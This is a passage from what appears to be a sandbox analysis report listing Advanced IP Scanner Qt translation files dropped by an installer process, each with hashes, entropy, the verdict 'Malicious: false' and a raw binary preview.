SSDEEP:	384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
MD5:	C41CF1ECCEF6EB2CB6BBAF02A383BC28
SHA1:	B2E5D8721D04232F7219AC00496379C14576E33D
SHA-256:	61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
SHA-512:	341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
Malicious:	false
Preview:	<.d....!..`...B..........W....;...X...;.......;...U...;..!?...;..B....O..Z....[..V....^../....^..Rh..(5......G....$..H,..Op..K...?T..N:......V...DQ.._...\.......(.......O....y..P........o.......t......W....t..s...t..Pv...t..Zo.....@@...j...#..5t......@...B...H5..X...f.../.......E....................~..2....`..6....e..Y.......Z........(. =...F...y......y...A..%..$...0..$..+.......+.......+....<.+......+....&..G.... M.G......H0...ZC.Hw9...q.Hw9...c.I....(r.J6....".J6......J6......J6...H..LD......L.b..Z..M.S..@..R.....\.V..../..Wi...Y..W.T.....Z.\|..QE.[f3..U..gc......w0K..G<..H...%.......[....T......."..4T...~..6b.. d..E{...T......2....+......X......._M.9.E..?..L.#..a..M$o.....e.......l8...5....^..H...I....b......B4......R!......X...>...=..>......3../K..l...JN......9p.5.l..^C.AV...(1.y....V....0..R.......Q.......XM..tb..4................s......SS......<.......N..(....R..1V...)L.R....1..W.<..^..f.~..".......3...1........^..5e...5..............c..E..;6...`g.q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nb_no.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26887
Entropy (8bit):	4.711499642917058
Encrypted:	false
SSDEEP:	768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
MD5:	D0C083D4760D44DB80A0AEDE7862D5EC
SHA1:	155B7B067596D105B0BC4471BD654F1D9B720D20
SHA-256:	186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
SHA-512:	B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
Malicious:	false
Preview:	<.d....!..`...B..........U....;.......;...U...;...g...;.. ....;..@....O..W....[..S....^...)...^..O...(5......G.......H,..L...K...=H..N:......V...B..._...X.......'.......M....y..M................d......T....t..)5...t..M....t..W......>....j...5..5t......@...?...H5..U...f....I......B........i.......%...~..1<...`..5 ...e..W.......W+......... =...C...y......y...3..%..#v..0..#..+.....s.+.......+......+......+....%Q.G.....A.G....)..H0...WW.Hw9...C.Hw9...s.I....'<.J6......J6......J6......J6...F/.LD......L.b..W..M.S..>..R.....".V.....o.Wi...V..W.T.....Z.\|..N..[f3..R^.gc....N.w0K..D...H...$Q......Xz...T......."..2....~..4... d..C=...T..,...2...........V ......\K.9.E..=..L.#..^..M$o.....e.......l8...4i...^..Fb..I....8......@.......O.......U...>......>...f..3..-...l...G.......7..5.l..[9.AV...&..y....T%...0..PT......OM......Uy..tb..3........?.......g......P.......:.......K..(....O..1V...(..R....0;.W.<..[..f.~.. .......2...1........^..3....5..........x...c..C..;6...]m.q.J..Lh..I....O..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nl_nl.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28029
Entropy (8bit):	4.645006029092153
Encrypted:	false
SSDEEP:	384:nsoeTpwn8BLKep+1uYLGPlUMpitDd0FoTGv8QAyEDPQRBHYerHcgDOIq0IDbn8:nsoeTpXr+KiBd0qTayPQRdBv
MD5:	1DCBBF653BCB4D127D902EAB60CBB42A
SHA1:	BDC0ACD9FEE35B3F1446210A45C5B20ED9987F8A
SHA-256:	F1C9FB8580866B3066DD4BA9A559F3161B4E3240831A8439F9720B12B40FA010
SHA-512:	9A85094294FB5884BDD548E7BEDFCB97760ABE61ED76AAC5EF2E7AF6127EBEC33D1F16FF3DB7FC59FB294C12F3E78E2547BABB4A992864B13CC3BAC7DB0C8F22
Malicious:	false
Preview:	<.d....!..`...B..........YP...;.......;.......;.......;..!o...;..C....O..\....[..W....^..0)...^..S...(5......G....H..H,..P...K...@P..N:...J..V...EA.._...]B......) ......P....y..QM...............R......Y&...t......t..Q....t..[......A,...j......5t......@...C...H5..Y...f...0I......E....................~..3....`..7....e..[;......[c.......B. =...F...y......y......%..$..*.0..%..+.....5.+.......+....h.+......+....&..G.... ..G....+-.H0...[..Hw9...S.Hw9.....I....(..J6....x.J6......J6......J6...I..LD......L.b..[..M.S..A..R.......V....0s.Wi...Z..W.T.....Z.\|..R..[f3..Vn.gc....Z.w0K..H...H...%.......\....T...9..."..5....~..74.. d..Fg...T......2....7......ZP......`..9.E..@..L.#..cO.M$o.....e.......l8...6....^..I...I....Z......CF......Sw......Z...>...m..>......3../...l...K@......:>.5.l.._..AV...(q.y....Xa...0..TF......S9......Y...tb..5................Q......T.......=.......O`.(....S..1V...)..R....2..W.<..`%.f.~.."4......4...1....A...^..6;...5..............c..F..;6...a..q.J..P,..I....=..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pl_pl.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28357
Entropy (8bit):	4.7436866012778625
Encrypted:	false
SSDEEP:	384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
MD5:	45864510329D981D80C616641357FEFF
SHA1:	C4EB7D6D98D29656FA2DE8E9923750556408E865
SHA-256:	3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
SHA-512:	93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G...y......y......%..%~..0..%..+.....;.+......+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.\|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pt_br.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28217
Entropy (8bit):	4.655652026218731
Encrypted:	false
SSDEEP:	768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
MD5:	C8AF2228F3F331635F1E4E55E1C9FD32
SHA1:	9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
SHA-256:	16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
SHA-512:	DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..DV...O..\....[..X....^..0o...^..Td..(5......G....v..H,..QV..K...@...N:...h..V...E..._...^"......)N......Q....y..Q.......................Y....t..+....t..Rl...t..\k.....A....j......5t......@...C...H5..Z...f...0.......Fd...................~..3j...`..8....e..[.......\........N. =...G...y......y...Y..%..%...0..%E.+.....;.+.......+....n.+......+....&..G.... ..G....+a.H0...\A.Hw9.....Hw9.....I....(..J6....j.J6......J6......J6...JM.LD......L.b..\..M.S..B..R.......V....0..Wi...[..W.T.....Z.\|..SA.[f3..W..gc....D.w0K..H...H...%.......]....T...A..."..5r...~..7... d..F....T......2....G......Z.......as.9.E..A..L.#..d..M$o.....e.......l8...7E...^..J...I....^......C.......T.......Z...>...Y..>......3..0...l...L.......:..5.l..`..AV...(..y....X....0..T.......S.......ZW..tb..60......................US......>(......P..(....T..1V...)..R....2_.W.<..`..f.~.."T......4...1....;...^..6....5..............c..GF.;6...b..q.J..P...I....1..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ro_ro.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28132
Entropy (8bit):	4.6803756692053184
Encrypted:	false
SSDEEP:	384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
MD5:	2DB27B87481EDE8D4FE8C92431A5C5AC
SHA1:	0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
SHA-256:	A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
SHA-512:	B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;...O...;.. K...;.."%...;..D....O..\....[..Xh...^..0....^..T,..(5......G.......H,..Q...K...@...N:......V...E..._...].......).......Q[...y..Q.......................Y....t..+....t..RD...t..\+.....A....j.. ...5t......@...C...H5..ZU..f...0.......F................E...~..3....`..8d...e..[.......[........t. =...G...y......y......%..%...0..%..+.....{.+.....0.+......+....h.+....'u.G....!+.G....+..H0...\..Hw9.....Hw9...Q.I....)r.J6......J6....>.J6......J6...JY.LD......L.b..\X.M.S..BR.R.......V....1..Wi...[L.W.T...5.Z.\|..S..[f3..V..gc....z.w0K..H...H...&.......]<...T...q..."..5....~..7... d..G....T../I..2....e......Z.......a..9.E..AL.L.#..c..M$o.....e.....B.l8...7....^..J...I....b......C.......S.......Z}..>...y..>......3..0q..l...L.......;..5.l..`..AV...)'.y....X....0..T.......S.......Z...tb..6........I..............U.......>p......O..(....TR.1V...*h.R....2..W.<..`..f.~..".......5`..1........^..7....5..............c..G^.;6...b?.q.J..P...I....s..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ru_ru.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28292
Entropy (8bit):	5.300323619618019
Encrypted:	false
SSDEEP:	384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
MD5:	70059C7809B9DB196A6A58588536B7D6
SHA1:	6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
SHA-256:	7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
SHA-512:	EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
Malicious:	false
Preview:	<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)\|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8\|...e..\M......\s......... =...G...y...b..y...%..%..%X..0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sk_sk.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27607
Entropy (8bit):	4.7796924802259895
Encrypted:	false
SSDEEP:	768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
MD5:	3AB470D0817DA632BCDA59AB7C24C08B
SHA1:	C2A643FF68C75A0573ED6A506427F3233848453C
SHA-256:	8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
SHA-512:	A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
Malicious:	false
Preview:	<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t......t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E...y...p..y......%..$B..0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.\|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sl_si.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28344
Entropy (8bit):	4.687451491727224
Encrypted:	false
SSDEEP:	384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
MD5:	950906410E936E0BB5F109082105D7B6
SHA1:	C2B7B811141FDAC2DBC712095759E3C68CE77565
SHA-256:	F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
SHA-512:	FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
Malicious:	false
Preview:	<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G...y......y...]..%..%6..0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sr_latn_rs.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27834
Entropy (8bit):	4.7072414399522335
Encrypted:	false
SSDEEP:	384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
MD5:	A3264DCBED0CEFC981230E4CCADF8807
SHA1:	0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
SHA-256:	6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
SHA-512:	7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7...e..Z.......Z........6. =...Fo..y......y...]..%..$...0..$..+.....G.+.......+....x.+......+....&..G.... ..G......H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.\|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sv_se.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27099
Entropy (8bit):	4.717079738585517
Encrypted:	false
SSDEEP:	384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
MD5:	58ACBFB46226E1833250D5F5A7CE7D6E
SHA1:	5711848C2E2E5D5144B5F965A0F856611773A7F4
SHA-256:	7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
SHA-512:	DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
Malicious:	false
Preview:	<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5\|...e..W.......X.......... =...DI..y......y......%..#...0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.\|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...\|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_th_th.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26514
Entropy (8bit):	5.365287004508335
Encrypted:	false
SSDEEP:	384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
MD5:	31966D909B8293307AC3545ACA55CD13
SHA1:	1B49E43C0109445BA5068E2ED8422CB308D99B12
SHA-256:	81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
SHA-512:	7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
Malicious:	false
Preview:	<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3...e..Um......U.......... =...A...y......y...9..%.."...0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....\|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.\|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T.....2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&\|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_tr_tr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27282
Entropy (8bit):	4.801156368722529
Encrypted:	false
SSDEEP:	768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
MD5:	4DD48C8DA1964B46D4D972244288081A
SHA1:	1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
SHA-256:	572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
SHA-512:	59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
Malicious:	false
Preview:	<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=..y...P..y...-..%..#...0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.\|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q\|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........\|...c..D..;6..._..q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_uk_ua.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28836
Entropy (8bit):	5.274937745581086
Encrypted:	false
SSDEEP:	768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
MD5:	EE64BC556D9E554E5122531BBA368240
SHA1:	C691C2D832157EF9FD50F0D2C5B91EA9B6934979
SHA-256:	11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
SHA-512:	23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
Malicious:	false
Preview:	<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I...y......y......%..&...0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.\|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V.....R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_vi_vn.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27204
Entropy (8bit):	5.005345988323232
Encrypted:	false
SSDEEP:	384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
MD5:	53839022420E21292B81995749C5BCBD
SHA1:	D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
SHA-256:	44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
SHA-512:	6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
Malicious:	false
Preview:	<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D...y......y......%..$X..0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.\|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_cn.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21282
Entropy (8bit):	5.593895866111406
Encrypted:	false
SSDEEP:	384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
MD5:	6885AC8F42A02A32B59AA84D330925C3
SHA1:	A070B4B8BF1128197681487D332168A537107FB9
SHA-256:	2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
SHA-512:	4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
Malicious:	false
